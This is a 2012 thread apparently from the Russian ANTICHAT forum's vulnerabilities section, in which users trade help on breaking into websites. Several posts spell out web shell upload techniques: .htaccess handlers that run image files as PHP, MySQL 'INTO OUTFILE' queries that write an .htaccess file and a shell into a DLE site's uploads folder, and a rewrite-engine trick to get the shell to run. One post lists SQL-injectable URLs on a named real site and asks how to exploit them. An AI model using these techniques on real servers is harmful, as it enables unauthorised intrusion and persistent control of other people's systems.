HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.04.2012, 11:18
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от mix0x0  
mix0x0 said:
Есть xss на одном ресурсе, не получается определить тип.
Создаю новость, вписываю в тело страницы
При обновлении, вылетает пустой алерт. В исходнике не отображается вписанный код. Первая мысль, что это DOM-BASED, но вся соль в том, что я ява-скрипт не вписываю через адресную строку, следовательно мой код где-то сохраняется, но когда после вылета алерта открываю исходник, то эксплойта нет!
не подскажите, что за бред с xss?)
Это DOM BASED
 
Ответить с цитированием

  #2  
Старый 25.04.2012, 17:20
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

пытаюсь залить шелл (я могу заливать zip архивы, а на сервере он сам распаковывается), сам файл норм. заливается, но при открытии shell.php выскакивает ошибка:

Цитата:
Сообщение от None  
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, postmaster@site.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
я так понял это из-за htaccess, попробовал залить свой htaccess с содержимым

Цитата:
Сообщение от None  
AddType application/x-httpd-php .png
AddHandler application/x-httpd-php .png
но при попытки открыть shell.png он просто скачивается.

вообщем я хз что делать...
 
Ответить с цитированием

  #3  
Старый 25.04.2012, 17:54
HeaVeNSeR
Новичок
Регистрация: 03.12.2008
Сообщений: 5
Провел на форуме:
597696

Репутация: 1
Отправить сообщение для HeaVeNSeR с помощью ICQ
По умолчанию

ребят,подскажите,плз...в какую сторону копать?)...

сканнер показывает blind-sql здесь в параметре mna :

http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=S earch&sexarray[]=male&srch=y&srchsexarray=1&mna=-89

http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=S earch&sexarray[]=male&srch=y&srchsexarray=1&mna=89

здесь ошибка с раскрытием путей:

http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=S earch&sexarray=male&srch=y&srchsexarray=1

можно ли раскрутить это скулю или это ошибка сканнера?
 
Ответить с цитированием

  #4  
Старый 25.04.2012, 19:56
Марок
Guest
Сообщений: n/a
Провел на форуме:
10959

Репутация: 0
По умолчанию

мел кто дело с SFTcms v 2.0?

Картинки заливаются, но куда, черт ногу сломит =/
 
Ответить с цитированием

  #5  
Старый 25.04.2012, 20:24
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от Марок  
Марок said:
мел кто дело с SFTcms v 2.0?
Картинки заливаются, но куда, черт ногу сломит =/
А посмотреть уже залитые картинке не?
 
Ответить с цитированием

  #6  
Старый 26.04.2012, 00:52
красавец
Guest
Сообщений: n/a
Провел на форуме:
5300

Репутация: 5
По умолчанию

подскажите, имеется доступ к mysql.root, как можно залить шел на сервере, CMS DLE 9,5

я делаю по 2 запроса одного типа

первый

Цитата:
Сообщение от None  
select 'php_flag engine on
\r
AddType application/x-httpd-php .phtml .jpg .html
\r
AddHandler application/x-httpd-php .phtml .jpg .html' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/.htaccess'
и второй сам шелл

Цитата:
Сообщение от None  
select '' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/s.jpg'
оба запроса в одну папку разумеется

всё заливается, и htaccess и шелл, но шел не открывает, хотя htaccess стоит "вроде бы" как положено..

Так же html и другие форматы заливаются типа .xss формат но уже Internal Server Error кажет



Что ещё можно залить вместо моего htaccess ?
 
Ответить с цитированием

  #7  
Старый 26.04.2012, 00:58
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от красавец  
красавец said:
Что ещё можно залить вместо моего htaccess ?
либо я так сильно спать хочу и чего-то не понимаю, либо ты наркоман, но что мешает сделать into outfile в PHP файл?
 
Ответить с цитированием

  #8  
Старый 26.04.2012, 01:09
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

Цитата:
Сообщение от красавец  
красавец said:
подскажите, имеется доступ к mysql.root, как можно залить шел на сервере,
CMS DLE 9,5
я делаю по 2 запроса одного типа
первый
и второй сам шелл
оба запроса в одну папку разумеется
всё заливается, и htaccess и шелл, но шел не открывает, хотя htaccess стоит "вроде бы" как положено..
Так же html и другие форматы заливаются типа .xss формат но уже
Internal Server Error
кажет


Что ещё можно залить вместо моего htaccess ?

Прочитай .htaccess, может, там какие-то хитрые фильтры стоят при записи(то есть убедись, что все записалось нормально, нет лишних символов, перенос строки выполнен правильно)

Ну и да, как d1v сказал выше, что тебе мешает выполнить запрос select '' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/s.php'
 
Ответить с цитированием

  #9  
Старый 26.04.2012, 01:11
красавец
Guest
Сообщений: n/a
Провел на форуме:
5300

Репутация: 5
По умолчанию

Цитата:
Сообщение от d1v  
d1v said:
либо я так сильно спать хочу и чего-то не понимаю, либо ты наркоман, но что мешает сделать into outfile в PHP файл?
мешает то что php не открывается просто так

я пытался разумеется сначало php залить
 
Ответить с цитированием

  #10  
Старый 26.04.2012, 01:19
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от красавец  
красавец said:
мешает то что php не открывается просто так
я пытался разумеется сначало php залить
ну попробуй в папку залить хтакес:

Цитата:
Сообщение от None  
RewriteEngine Off
и патом в пхп записаться уже.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ